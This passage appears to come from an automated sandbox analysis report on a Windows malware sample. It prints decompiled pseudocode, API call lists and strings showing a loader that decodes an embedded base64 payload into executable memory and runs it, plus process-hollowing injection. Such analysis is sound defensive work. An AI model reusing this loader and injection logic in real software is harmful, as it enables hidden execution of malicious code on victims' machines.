                  					E00408250(_v100, _v80, _v44, _v156);
                  					_v108 = VirtualAlloc(0, _v84, 0x1000, 0x40);
                  					E00428B70(_t157, _t200, _t201, _v108, _v36, _v84);
                  					_v32 = VirtualAlloc(0, _v44, 0x1000, 0x40);
                  					E00428B70(_t157, _t200, _t201, _v32, _v100, _v44);
                  					_t188 = _v40;
                  					_t152 = _v32(_v40, 1, _v108,  &_v84);
                  					_t211 = _t213 + 0x38;
                  					if(_t152 == 0) {
                  						_t188 = _v40;
                  						_v32(_v40, 0x10, _v108,  &_v84);
                  						_t211 = _t211 + 0x10;
                  					}
                  					_v116 = _v108;
                  					_v124 = _v116();
                  				}
                  				E0041E32C(_t157, _v140, _t188, _t200, L"Local AppWizard-Generated Applications");
                  				_v132 = E00408810(0x2e4);
                  				_v8 = 1;
                  				_t222 = _v132;
                  				if(_v132 == 0) {
                  					_v160 = 0;
                  				} else {
                  					_v160 = E004065A0(_t157, _t200, _t201, _t222);
                  				}
                  				_v128 = _v160;
                  				_v8 = 0;
                  				_v20 = _v128;
                  				 *((intOrPtr*)(_v140 + 0x20)) = _v20;
                  				 *((intOrPtr*)(_v140 + 0xa4)) = E00406970(_v20);
                  				 *((intOrPtr*)( *((intOrPtr*)( *_v20 + 0x140))))(0xcf8000, 0, 0);
                  				E00411E2C(_v20, 5);
                  				E00408830(_v20);
                  				E00408850(_v20, 0);
                  				_v136 = 1;
                  				_v8 = 0xffffffff;
                  				E00408A60( &_v76);
                  				 *[fs:0x0] = _v16;
                  				return E00427DFF(_v136, _t157, _v48 ^ _t202,  *_v20, _t200, _t201, 0x80);
                  			}


                  APIs
                    • Part of subcall function 004080A0: LoadLibraryExW.KERNELBASE(00000000,00000000,00000000,?), ref: 0040817D
                  • _malloc.LIBCMT ref: 004085AD
                    • Part of subcall function 004282CD: __FF_MSGBANNER.LIBCMT ref: 004282F0
                    • Part of subcall function 004282CD: __NMSG_WRITE.LIBCMT ref: 004282F7
                    • Part of subcall function 004282CD: RtlAllocateHeap.NTDLL(00000000,8006FFFF,?,00000000,00000000,?,0040B742,8007000E,00000000,?,00415254,0000000C,00000004,00404BDC,8007000E), ref: 00428344
                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,?,?,?,?,?,?,?,?,6jNbzvTGN1oFlwA71E9y0D/kDbfWIfDA2qGpwAo20MZ22rR85xJFPyYJjdllx6iTGJgFaiqsIeQZZ3Tqv3QsGLy13Fsf5GrTj8veFSk3XVtHNnNv3GY96WmAYfZFNHjv7mgfET08/Z7buHM1azrYHI26N3/QoTuGrUEf6bPV/yxeOW9IEeR43rgSEaHZT886fjDhDxT4prA5h5NX3sqFSpKLsGvoSi6pri1Rgcpm7drCgbucPUg6iVNUlUynjiwGCq9X), ref: 004086B0
                  • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000040), ref: 004086D7
                  Strings
                  • kernel32.dll, xrefs: 00408565
                  • Local AppWizard-Generated Applications, xrefs: 00408729
                  • 6jNbzvTGN1oFlwA71E9y0D/kDbfWIfDA2qGpwAo20MZ22rR85xJFPyYJjdllx6iTGJgFaiqsIeQZZ3Tqv3QsGLy13Fsf5GrTj8veFSk3XVtHNnNv3GY96WmAYfZFNHjv7mgfET08/Z7buHM1azrYHI26N3/QoTuGrUEf6bPV/yxeOW9IEeR43rgSEaHZT886fjDhDxT4prA5h5NX3sqFSpKLsGvoSi6pri1Rgcpm7drCgbucPUg6iVNUlUynjiwGCq9X, xrefs: 004085CC
                  • FindResourceA, xrefs: 00408521
                  • LockResource, xrefs: 00408560
                  • kernel32.dll, xrefs: 00408630
                  • kernel32.dll, xrefs: 00408526
                  • kernel32.dll, xrefs: 00408550
                  • VirtualAlloc, xrefs: 0040862B
                  • LoadResource, xrefs: 00408536
                  • kernel32.dll, xrefs: 0040853B
                  • SizeofResource, xrefs: 0040854B
                  • VERTKS, xrefs: 00408575
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: AllocVirtual$AllocateHeapLibraryLoad_malloc
                  • String ID: 6jNbzvTGN1oFlwA71E9y0D/kDbfWIfDA2qGpwAo20MZ22rR85xJFPyYJjdllx6iTGJgFaiqsIeQZZ3Tqv3QsGLy13Fsf5GrTj8veFSk3XVtHNnNv3GY96WmAYfZFNHjv7mgfET08/Z7buHM1azrYHI26N3/QoTuGrUEf6bPV/yxeOW9IEeR43rgSEaHZT886fjDhDxT4prA5h5NX3sqFSpKLsGvoSi6pri1Rgcpm7drCgbucPUg6iVNUlUynjiwGCq9X$FindResourceA$LoadResource$Local AppWizard-Generated Applications$LockResource$SizeofResource$VERTKS$VirtualAlloc$kernel32.dll$kernel32.dll$kernel32.dll$kernel32.dll$kernel32.dll
                  • API String ID: 2758549136-1592991391
                  • Opcode ID: b3c2247f901ed3182fb33a2e4e69bee6725a8b1ea1d99a3ad6e6d3759985ae41
                  • Instruction ID: a14d6f866eea3f191c63ddc651d3435c7a81f3ffa1da2a2e890fbe333cfd33b1
                  • Opcode Fuzzy Hash: b3c2247f901ed3182fb33a2e4e69bee6725a8b1ea1d99a3ad6e6d3759985ae41
                  • Instruction Fuzzy Hash: CF9109B1E002189FDB10DBE5CD42BAEBBB4EF48704F10816EE549BB281DB7869448F65
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  C-Code - Quality: 90%
                  			E0041F197(void* __ecx) {
                  				struct _CRITICAL_SECTION* _v8;
                  				void* _v12;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				struct _CRITICAL_SECTION* _t34;
                  				void* _t35;
                  				void* _t36;
                  				long _t38;
                  				void* _t39;
                  				void* _t40;
                  				long _t51;
                  				signed char* _t53;
                  				intOrPtr _t56;
                  				signed int _t57;
                  				void* _t61;
                  				signed int _t68;
                  				void* _t72;
                  
                  				_t59 = __ecx;
                  				_push(__ecx);
                  				_push(__ecx);
                  				_t72 = __ecx;
                  				_t1 = _t72 + 0x1c; // 0x44f9d8
                  				_t34 = _t1;
                  				_v8 = _t34;
                  				EnterCriticalSection(_t34);
                  				_t3 = _t72 + 4; // 0x20
                  				_t56 =  *_t3;
                  				_t4 = _t72 + 8; // 0x3
                  				_t68 =  *_t4;
                  				if(_t68 >= _t56) {
                  					L2:
                  					_t68 = 1;
                  					if(_t56 <= 1) {
                  						L7:
                  						_t13 = _t72 + 0x10; // 0x68c680
                  						_t35 =  *_t13;
                  						_t57 = _t56 + 0x20;
                  						_t83 = _t35;
                  						if(_t35 != 0) {
                  							_t36 = GlobalHandle(_t35);
                  							_v12 = _t36;
                  							GlobalUnlock(_t36);
                  							_t38 = E0041547B(_t57, _t59, _t68, _t72, __eflags, _t57, 8);
                  							_t61 = 0x2002;
                  							_t39 = GlobalReAlloc(_v12, _t38, ??);
                  						} else {
                  							_t51 = E0041547B(_t57, _t59, _t68, _t72, _t83, _t57, 8);
                  							_pop(_t61);
                  							_t39 = GlobalAlloc(2, _t51); // executed
                  						}
                  						if(_t39 == 0) {
                  							_t16 = _t72 + 0x10; // 0x68c680
                  							_t72 =  *_t16;
                  							if(_t72 != 0) {
                  								GlobalLock(GlobalHandle(_t72));
                  							}
                  							LeaveCriticalSection(_v8);
                  							_t39 = E00413D98(_t61);
                  						}
                  						_t40 = GlobalLock(_t39);
                  						_t18 = _t72 + 4; // 0x0
                  						_v12 = _t40;
                  						E004281D0(_t68, _t40 +  *_t18 * 8, 0, _t57 -  *_t18 << 3);
                  						 *(_t72 + 4) = _t57;
                  						 *(_t72 + 0x10) = _v12;
                  					} else {
                  						_t10 = _t72 + 0x10; // 0x68c680
                  						_t53 =  *_t10 + 8;
                  						while(( *_t53 & 0x00000001) != 0) {
                  							_t68 = _t68 + 1;
                  							_t53 =  &(_t53[8]);
                  							if(_t68 < _t56) {
                  								continue;
                  							}
                  							break;
                  						}
                  						if(_t68 >= _t56) {
                  							goto L7;
                  						}
                  					}
                  				} else {
                  					_t5 = _t72 + 0x10; // 0x68c680
                  					if(( *( *_t5 + _t68 * 8) & 0x00000001) != 0) {
                  						goto L2;
                  					}
                  				}
                  				_t25 = _t72 + 0xc; // 0x0
                  				if(_t68 >=  *_t25) {
                  					_t26 = _t68 + 1; // 0x1
                  					 *((intOrPtr*)(_t72 + 0xc)) = _t26;
                  				}
                  				_t28 = _t72 + 0x10; // 0x68c680
                  				 *( *_t28 + _t68 * 8) =  *( *_t28 + _t68 * 8) | 0x00000001;
                  				_t32 = _t68 + 1; // 0x4
                  				 *(_t72 + 8) = _t32;
                  				LeaveCriticalSection(_v8);
                  				return _t68;
                  			}























                  APIs
                  • EnterCriticalSection.KERNEL32(0044F9D8,?,?,?,0044F9BC,0044F9BC,?,0041F5ED,00000004,0042084C,0040C879,0041196D,?,0040CD7B,?,0040104E), ref: 0041F1AA
                  • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,0044F9BC,0044F9BC,?,0041F5ED,00000004,0042084C,0040C879,0041196D,?,0040CD7B), ref: 0041F200
                  • GlobalHandle.KERNEL32(0068C680), ref: 0041F209
                  • GlobalUnlock.KERNEL32(00000000,?,?,?,0044F9BC,0044F9BC,?,0041F5ED,00000004,0042084C,0040C879,0041196D,?,0040CD7B,?,0040104E), ref: 0041F213
                  • GlobalReAlloc.KERNEL32(?,00000000,00002002), ref: 0041F22C
                  • GlobalHandle.KERNEL32(0068C680), ref: 0041F23E
                  • GlobalLock.KERNEL32(00000000,?,?,?,0044F9BC,0044F9BC,?,0041F5ED,00000004,0042084C,0040C879,0041196D,?,0040CD7B,?,0040104E), ref: 0041F245
                  • LeaveCriticalSection.KERNEL32(?,?,?,?,0044F9BC,0044F9BC,?,0041F5ED,00000004,0042084C,0040C879,0041196D,?,0040CD7B,?,0040104E), ref: 0041F24E
                  • GlobalLock.KERNEL32(00000000,?,?,?,0044F9BC,0044F9BC,?,0041F5ED,00000004,0042084C,0040C879,0041196D,?,0040CD7B,?,0040104E), ref: 0041F25A
                  • _memset.LIBCMT ref: 0041F274
                  • LeaveCriticalSection.KERNEL32(?), ref: 0041F2A2
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                  • String ID:
                  • API String ID: 496899490-0
                  • Opcode ID: 44d6156ca0fc16f0a1ea0d46616567fa5785abee713f246d0c36fb83f094be5e
                  • Instruction ID: 98b8ad5a6c79ae29f804285d5a9b3c614ea8ac3e30d9a8c0b5193570b51ee080
                  • Opcode Fuzzy Hash: 44d6156ca0fc16f0a1ea0d46616567fa5785abee713f246d0c36fb83f094be5e
                  • Instruction Fuzzy Hash: 2331D071640700AFC720CF65DC89A9BBBF9EF44304B00497EE896D3260DB39F8858B19
                  Uniqueness

                  Uniqueness Score: 1.18%

                  Control-flow Graph

                  control_flow_graph 128 521980-521a2e call 521000 131 521a35-521a5e call 522860 CreateFileW 128->131 134 521a60 131->134 135 521a65-521a78 131->135 136 521bb9-521bbd 134->136 142 521a7a 135->142 143 521a7f-521a99 VirtualAlloc 135->143 138 521c05-521c08 136->138 139 521bbf-521bc3 136->139 144 521c0b-521c12 138->144 140 521bc5-521bc8 139->140 141 521bcf-521bd3 139->141 140->141 145 521be6-521bea 141->145 146 521bd5-521bdf 141->146 142->136 147 521aa0-521aba ReadFile 143->147 148 521a9b 143->148 149 521c67-521c7c 144->149 150 521c14-521c1f 144->150 153 521bec-521bf6 145->153 154 521bfd 145->154 146->145 155 521ac1-521b01 VirtualAlloc 147->155 156 521abc 147->156 148->136 151 521c7e-521c89 VirtualFree 149->151 152 521c8f-521c97 149->152 157 521c23-521c2f 150->157 158 521c21 150->158 151->152 153->154 154->138 159 521b03 155->159 160 521b08-521b23 call 522ab0 155->160 156->136 161 521c43-521c4f 157->161 162 521c31-521c41 157->162 158->149 159->136 168 521b2e-521b38 160->168 164 521c51-521c5a 161->164 165 521c5c-521c62 161->165 163 521c65 162->163 163->144 164->163 165->163 169 521b3a-521b69 call 522ab0 168->169 170 521b6b-521b7f call 5228c0 168->170 169->168 176 521b83-521b87 170->176 177 521b81 170->177 178 521b93-521b97 176->178 179 521b89-521b8d CloseHandle 176->179 177->136 180 521baa-521bb3 178->180 181 521b99-521ba4 VirtualFree 178->181 179->178 180->131 180->136 181->180
                  APIs
                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00521A51
                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00521C89
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.297282519.00521000.00000020.00000001.sdmp, Offset: 00521000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_521000_982.jbxd
                  Similarity
                  • API ID: CreateFileFreeVirtual
                  • String ID: |"R
                  • API String ID: 204039940-2155691742
                  • Opcode ID: 61ae92364ca28658410062bed1a011159a615ec3b8f6d1c7bbb5100bd63cb779
                  • Instruction ID: a106381d7daa29c2b4029a2e24d6ecf773e8d24871b391af8e39177a7f678a78
                  • Opcode Fuzzy Hash: 61ae92364ca28658410062bed1a011159a615ec3b8f6d1c7bbb5100bd63cb779
                  • Instruction Fuzzy Hash: 23A12974E00218EBDB14CFA4D994BEEBBB5BF59304F208599E505BB2C0D7759E80CB98
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Control-flow Graph

                  C-Code - Quality: 100%
                  			E0042156B(void* __ecx) {
                  				int _t5;
                  				struct HDC__* _t15;
                  				void* _t17;
                  
                  				_t17 = __ecx; // executed
                  				_t5 = GetSystemMetrics(0xb); // executed
                  				 *(_t17 + 8) = _t5;
                  				 *((intOrPtr*)(_t17 + 0xc)) = GetSystemMetrics(0xc);
                  				 *0x44fc10 = GetSystemMetrics(2) + 1;
                  				 *0x44fc14 = GetSystemMetrics(3) + 1;
                  				_t15 = GetDC(0);
                  				 *((intOrPtr*)(_t17 + 0x18)) = GetDeviceCaps(_t15, 0x58);
                  				 *((intOrPtr*)(_t17 + 0x1c)) = GetDeviceCaps(_t15, 0x5a);
                  				return ReleaseDC(0, _t15);
                  			}







                  APIs
                  • GetSystemMetrics.USER32(0000000B), ref: 0042157A
                  • GetSystemMetrics.USER32(0000000C), ref: 00421581
                  • GetSystemMetrics.USER32(00000002), ref: 00421588
                  • GetSystemMetrics.USER32(00000003), ref: 00421592
                  • GetDC.USER32(00000000), ref: 0042159C
                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 004215AD
                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004215B5
                  • ReleaseDC.USER32(00000000,00000000), ref: 004215BD
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: MetricsSystem$CapsDevice$Release
                  • String ID:
                  • API String ID: 1151147025-0
                  • Opcode ID: c7c1890664744fd191cec8471a3303c8f771b63820afe01bf1e01e85f0efeded
                  • Instruction ID: bfbaa5b229bd2a613bc3f5bc7cad35cca062a458ca99e43de76c0c3162067048
                  • Opcode Fuzzy Hash: c7c1890664744fd191cec8471a3303c8f771b63820afe01bf1e01e85f0efeded
                  • Instruction Fuzzy Hash: D8F049B1E80718BAE7105F72AC4DB167E68FB41761F004426E6048B2C0CBB598208FD0
                  Uniqueness

                  Uniqueness Score: 0.24%

                  Control-flow Graph

                  C-Code - Quality: 95%
                  			E004277E2(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16) {
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t11;
                  				void* _t14;
                  				intOrPtr _t17;
                  				void* _t18;
                  				struct HINSTANCE__* _t19;
                  				void* _t31;
                  				intOrPtr _t35;
                  				void* _t36;
                  				void* _t37;
                  
                  				_t37 = __eflags;
                  				_t32 = __edi;
                  				_t31 = __edx;
                  				_t25 = __ebx;
                  				_t11 = SetErrorMode(0); // executed
                  				SetErrorMode(_t11 | 0x00008001); // executed
                  				_t14 = E0042083D(__ebx, __edi, SetErrorMode, _t37);
                  				_t35 = _a4;
                  				 *((intOrPtr*)(_t14 + 8)) = _t35;
                  				 *((intOrPtr*)(_t14 + 0xc)) = _t35;
                  				E0041FFE4(_t14); // executed
                  				_t17 =  *((intOrPtr*)(E0042083D(__ebx, __edi, _t35, _t37) + 4));
                  				_t38 = _t17;
                  				if(_t17 != 0) {
                  					 *((intOrPtr*)(_t17 + 0x48)) = _a12;
                  					 *((intOrPtr*)(_t17 + 0x4c)) = _a16;
                  					 *((intOrPtr*)(_t17 + 0x44)) = _t35;
                  					E0042764D(_t17, _t31, _t38);
                  				}
                  				_t18 = E0042083D(_t25, _t32, _t35, _t38);
                  				_t39 =  *((char*)(_t18 + 0x14));
                  				_pop(_t36);
                  				if( *((char*)(_t18 + 0x14)) == 0) {
                  					E0041DC8F(_t36, _t39);
                  				}
                  				_t19 = GetModuleHandleW(L"user32.dll");
                  				if(_t19 != 0) {
                  					 *0x44f5d4 = GetProcAddress(_t19, "NotifyWinEvent");
                  				}
                  				return 1;
                  			}















                  APIs
                  • SetErrorMode.KERNELBASE(00000000), ref: 004277F0
                  • SetErrorMode.KERNELBASE(00000000), ref: 004277F8
                    • Part of subcall function 0041FFE4: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0042001C
                    • Part of subcall function 0041FFE4: SetLastError.KERNEL32(0000006F), ref: 00420033
                  • GetModuleHandleW.KERNEL32(user32.dll), ref: 00427847
                  • GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 00427857
                    • Part of subcall function 0042764D: GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 0042768A
                    • Part of subcall function 0042764D: PathFindExtensionW.SHLWAPI(?), ref: 004276A4
                    • Part of subcall function 0042764D: __wcsdup.LIBCMT ref: 004276EE
                    • Part of subcall function 0042764D: __wcsdup.LIBCMT ref: 0042772D
                    • Part of subcall function 0042764D: __wcsdup.LIBCMT ref: 0042777F
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: ErrorModule__wcsdup$FileModeName$AddressExtensionFindHandleLastPathProc
                  • String ID: NotifyWinEvent$user32.dll
                  • API String ID: 3531328582-597752486
                  • Opcode ID: 600bd65f5b6164353d1c9d85679ea76e877092f1a3819f8c30deecd54c82a801
                  • Instruction ID: 19a4000a33e12c2da336ff7ebcaa9982c4ad57cceb2baca74a4ff91e24ba1e1f
                  • Opcode Fuzzy Hash: 600bd65f5b6164353d1c9d85679ea76e877092f1a3819f8c30deecd54c82a801
                  • Instruction Fuzzy Hash: 2B01B1B0B543205FD710BF66A815B5B3AD8AF44710B45806FF84487362DB78C840CBAA
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Control-flow Graph

                  control_flow_graph 200 521470-521504 call 522a90 * 3 207 521506-521510 200->207 208 52151b 200->208 207->208 210 521512-521519 207->210 209 521522-52153b 208->209 212 521545 209->212 213 52153d-521540 209->213 210->209 215 52154c-521576 CreateProcessW 212->215 214 5218e7-5218e9 213->214 217 521578 215->217 218 52157d-521597 215->218 219 521899-52189d 217->219 225 521599 218->225 226 52159e-5215b9 ReadProcessMemory 218->226 220 5218e5 219->220 221 52189f-5218a3 219->221 220->214 223 5218b5-5218b9 221->223 224 5218a5-5218b1 221->224 227 5218c2-5218c6 223->227 228 5218bb-5218be 223->228 224->223 225->219 229 5215c0-5215c9 226->229 230 5215bb 226->230 234 5218c8-5218cb 227->234 235 5218cf-5218d3 227->235 228->227 231 5215f2-52160e call 522150 229->231 232 5215cb-5215da 229->232 230->219 244 521610 231->244 245 521615-521638 call 522290 231->245 232->231 236 5215dc-5215e4 call 5220a0 232->236 234->235 238 5218e0-5218e3 235->238 239 5218d5-5218db call 5220a0 235->239 243 5215e9-5215eb 236->243 238->214 239->238 243->231 246 5215ed 243->246 244->219 249 52163a-52163e 245->249 250 52167f-5216a0 call 522290 245->250 246->219 252 521640-521671 call 522290 249->252 253 52167a 249->253 256 5216a2 250->256 257 5216a7-5216c5 call 522ab0 250->257 259 521673 252->259 260 521678 252->260 253->219 256->219 263 5216d0-5216da 257->263 259->219 260->250 264 521710-521714 263->264 265 5216dc-52170e call 522ab0 263->265 266 52171a-52172a 264->266 267 5217ff-52181c call 521ca0 264->267 265->263 266->267 269 521730-521740 266->269 276 521820-52183f SetThreadContext 267->276 277 52181e 267->277 269->267 272 521746-52176a 269->272 275 52176d-521771 272->275 275->267 280 521777-52178c 275->280 278 521843-52184e call 521fd0 276->278 279 521841 276->279 277->219 286 521852-521856 278->286 287 521850 278->287 279->219 282 5217a0-5217a4 280->282 284 5217e2-5217fa 282->284 285 5217a6-5217b2 282->285 284->275 288 5217e0 285->288 289 5217b4-5217de 285->289 290 521858-52185c 
CloseHandle 286->290 291 52185f-521863 286->291 287->219 288->282 289->288 290->291 293 521865-521869 CloseHandle 291->293 294 52186c-521870 291->294 293->294 295 521872-521876 CloseHandle 294->295 296 521879-52187d 294->296 295->296 297 52188a-521893 296->297 298 52187f-521885 call 5220a0 296->298 297->215 297->219 298->297
                  APIs
                  • CreateProcessW.KERNEL32(?,00000000), ref: 00521571
                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 005215B4
                  Memory Dump Source
                  • Source File: 00000004.00000002.297282519.00521000.00000020.00000001.sdmp, Offset: 00521000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_521000_982.jbxd
                  Similarity
                  • API ID: Process$CreateMemoryRead
                  • String ID:
                  • API String ID: 2726527582-0
                  • Opcode ID: 475f0689a72174ff0ae04c85c88f1a3403d427bfc216527feeb2969a55ebaa05
                  • Instruction ID: ef4eb5ce2bba438c125816e868af3b8b6a53bc2135b01745d8b2a0fff60d147c
                  • Opcode Fuzzy Hash: 475f0689a72174ff0ae04c85c88f1a3403d427bfc216527feeb2969a55ebaa05
                  • Instruction Fuzzy Hash: 47F14974E00619EBDB18CF98D885FEEBBB5FF99300F248548E616AB2C0C770A941CB54
                  Uniqueness

                  Uniqueness Score: 5.06%

                  Control-flow Graph

                  control_flow_graph 300 4081a0-4081a8 301 4081b1-4081bb call 4080a0 300->301 302 4081aa-4081ac 300->302 305 4081c0-4081df 301->305 303 408245-408248 302->303 307 4081e1-4081e3 305->307 308 4081e5-408201 call 4282cd 305->308 307->303 311 408203-408205 308->311 312 408207-40823d call 4281d0 308->312 311->303 316 408243 312->316 317 40823f-408241 312->317 316->303 317->303
                  C-Code - Quality: 50%
                  			E004081A0(void* __ebx, void* __ecx, void* __esi, intOrPtr* _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
                  				intOrPtr _v8;
                  				intOrPtr _t17;
                  				intOrPtr _t19;
                  				intOrPtr _t27;
                  				void* _t47;
                  
                  				if(_a12 != 0) {
                  					_t17 = E004080A0(__ebx, _t47, __esi, __eflags, L"Crypt32.dll", "CryptStringToBinaryA"); // executed
                  					_v8 = _t17;
                  					_t41 = _a12;
                  					_t19 = _v8(_a12, _a16, 1, 0, _a8, 0, 0);
                  					__eflags = _t19;
                  					if(_t19 != 0) {
                  						 *_a4 = E004282CD(__ebx, _t41, _t47,  *_a8 + 1);
                  						__eflags =  *_a4;
                  						if( *_a4 != 0) {
                  							E004281D0(_t47,  *_a4, 0,  *_a8 + 1);
                  							_t27 = _v8(_a12, _a16, 1,  *_a4, _a8, 0, 0);
                  							__eflags = _t27;
                  							if(_t27 != 0) {
                  								return 1;
                  							}
                  							return 0;
                  						}
                  						return 0;
                  					}
                  					return 0;
                  				}
                  				return 0;
                  			}









                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID:
                  • String ID: Crypt32.dll$CryptStringToBinaryA
                  • API String ID: 0-2617671876
                  • Opcode ID: 3c33d3084efd74fc690c6a959d347e19cea363cd6ad14f8d7f53daf797e8e9f0
                  • Instruction ID: 2be41fb62754943cdb2ef28a5bdc4e1b23adf972fd76daa04f5380e5a9e63090
                  • Opcode Fuzzy Hash: 3c33d3084efd74fc690c6a959d347e19cea363cd6ad14f8d7f53daf797e8e9f0
                  • Instruction Fuzzy Hash: 68212970740208BFDB00CF54CD42FAB33A9EF49714F1095ADF945AB381DA7AE9119BA5
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Control-flow Graph

                  control_flow_graph 318 41ffe4-420024 call 41fee8 GetModuleFileNameW 321 4200d2-4200df call 427dff 318->321 322 42002a-42002f 318->322 323 420031-420039 SetLastError 322->323 324 42003e-420083 call 41ff56 322->324 323->321 329 4200a1-4200a8 324->329 330 420085-420096 call 41ff56 324->330 329->321 332 4200aa-4200bb call 41ff56 329->332 333 42009b 330->333 335 4200c0-4200c9 332->335 333->329 335->321 336 4200cb 335->336 336->321
                  C-Code - Quality: 70%
                  			E0041FFE4(void* __ecx) {
                  				signed int _v8;
                  				short _v10;
                  				short _v12;
                  				short _v532;
                  				struct HINSTANCE__* _v536;
                  				intOrPtr _v544;
                  				WCHAR* _v556;
                  				intOrPtr _v560;
                  				char _v564;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t25;
                  				intOrPtr _t36;
                  				intOrPtr _t40;
                  				struct HINSTANCE__* _t42;
                  				intOrPtr _t43;
                  				void* _t45;
                  				intOrPtr _t46;
                  				signed int _t50;
                  
                  				_t48 = _t50;
                  				_t25 =  *0x44c364; // 0xa6e2bca1
                  				_v8 = _t25 ^ _t50;
                  				_t45 = __ecx;
                  				E0041FEE8();
                  				_t42 =  *(__ecx + 8);
                  				_v10 = 0;
                  				_v12 = 0;
                  				if(GetModuleFileNameW(_t42,  &_v532, 0x105) != 0) {
                  					if(_v12 == 0) {
                  						_v556 =  &_v532;
                  						_push( &_v564);
                  						_v564 = 0x20;
                  						_v560 = 0x88;
                  						_v544 = 2;
                  						_v536 = _t42;
                  						_t30 = E0041FF56(); // executed
                  						 *(_t45 + 0x80) = _t30;
                  						if(_t30 == 0xffffffff) {
                  							_push( &_v564);
                  							_v544 = 3;
                  							_t30 = E0041FF56(); // executed
                  							 *(_t45 + 0x80) = _t30;
                  						}
                  						if( *(_t45 + 0x80) == 0xffffffff) {
                  							_push( &_v564);
                  							_v544 = 1;
                  							_t30 = E0041FF56(); // executed
                  							 *(_t45 + 0x80) = _t30;
                  							if(_t30 == 0xffffffff) {
                  								 *(_t45 + 0x80) =  *(_t45 + 0x80) & 0x00000000;
                  							}
                  						}
                  					} else {
                  						SetLastError(0x6f);
                  					}
                  				}
                  				_pop(_t43);
                  				_pop(_t46);
                  				return E00427DFF(_t30, _t36, _v8 ^ _t48, _t40, _t43, _t46);
                  			}























                  APIs
                    • Part of subcall function 0041FEE8: GetModuleHandleW.KERNEL32(KERNEL32,00420002), ref: 0041FEF6
                    • Part of subcall function 0041FEE8: GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 0041FF17
                    • Part of subcall function 0041FEE8: GetProcAddress.KERNEL32(ReleaseActCtx), ref: 0041FF29
